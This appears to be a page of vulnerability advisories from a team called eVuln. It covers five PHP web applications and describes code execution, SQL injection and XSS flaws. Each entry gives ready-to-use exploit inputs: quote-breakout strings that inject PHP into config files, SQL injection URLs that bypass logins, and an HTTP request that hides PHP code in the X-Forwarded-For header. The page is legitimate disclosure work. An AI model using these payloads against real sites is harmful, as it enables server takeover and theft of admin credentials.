Recent PHP Code Execution vulnerabilities
Here is short summary of recent PHP Code Execution vulnerabilities discovered by eVuln team. Full list with details is available on the eVuln Security Advisories page.
PHP Code Execution in Alguest.
Description.
It is possible to inject and execute arbitrary PHP code
All options values are written to dati/vars.php file. These values dont pass through any sanitation filter.
Vulnerable script: opzioni.php
Exploit.
All user-defined options may be used for php code injection and execution.
Password: 12345"; echo "PHP Code"; $aaa="
Solution
Solution is not available.
Other details >>SQL Injection and PHP Code Insertion in Pro Publish.
Description.
Vulnerable scripts: admin/login.php cat.php search.php art.php
Parameters email(login.php), password(login.php), find_str(search.php), artid(art.php), catid(cat.php) are not properly sanitized before being used in SQL query. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.
An intruder can get login and password of administration area using SQL Injection.
Administrator has an ability to edit some settings. Those values don't pass any sanitation before being saved in set_inc.php script. This can be used to make PHP code insertion.
System access is possible.
Exploit.
URL: http://[host]/cat.php?catid=999 or 1/*
URL: http://[host]/index.php
Searchengine: %' or 1/*
URL: http://[host]/admin/setup.php
Webmaster email: "; [PHP_code] $aaa="
Solution
Solution is not available.
Other details >>XSS and PHP Code Insertion in N.T..
Description.
Vulnerable Script: index.php
Parameter username is not properly sanitized. This can be used to post arbitrary HTML or web script code. This code will be executed when administrator will visit "Login Log" page.
Administrator's session is threatened.
Administrator has an ability to edit variables in ticker.db.php file. Script dont make any sanitation of entered values. This can be used to insert arbitrary PHP code.
System access is possible.
Exploit.
URL: http://[host]/index.php
Username: [XSS]
Password: any
URL: http://[host]/index.php?id=editticker
Ticker width: 100"; [PHP_CODE] $aaa="
Solution
Solution is not available.
Other details >>XSS and PHP Code Insertion Vulnerabilities in QLnews.
Description.
Vulnerable Script: news.php
Parameters autorx, newsx are not properly sanitized. This can be used to post arbitrary HTML or web script code.
Administrator has an ability to edit variable values in config.php file. This can be used to insert arbitrary PHP code into config file which executes by every php-script.
System access is possible.
Condition: magic_quotes_gpc = off
Exploit.
URL: http://[host]/qlnews/news.php?a=write&nr=1&opcja=1&wybor=1
Autor: [XSS]
Tresc: [XSS]
URL: http://[host]/qlnews/admin.php?a=settings
Number of news on main page: 5"; [php_code] $aa="
Solution
Solution is not available.
Other details >>PHP Code Execution and Multiple XSS in FreeForum.
Description.
Vulnerable Script: func.inc.php
Variables $_SERVER[HTTP_X_FORWARDED_FOR] $_SERVER[HTTP_CLIENT_IP] are not sanitized before being written into 'Data/flood.db.php' file. This can be used to inject arbitrary PHP code by posting HTTP query with fake X-Forwarded-For or Client-ip values.
System access is possible.
Vulnerable Script: func.inc.php
Variables $name $subject are not properly sanitized. This can be used to post message with arbitrary HTML or JavaScript code.
Exploit.
HTTP Query:
- POST /freeforum/index.php HTTP/1.0
- Host: [host]
- X-Forwarded-For: anyIP<? [code] ?>
- Content-Length: 91
- name=qqq&email=qqq@qqq.com&subject=qqq&text=qqq&mode=postanswer&thread=1&cat=1&submit=Add
URL: http://[host]/freeforum/index.php
Your name: [XSS]
Subject: [XSS]
Solution.
Vendor-provided solution is available now.
Install or Upgrade to version 1.2.1
http://soft.zoneo.net/freeForum/changes.php
Other details >>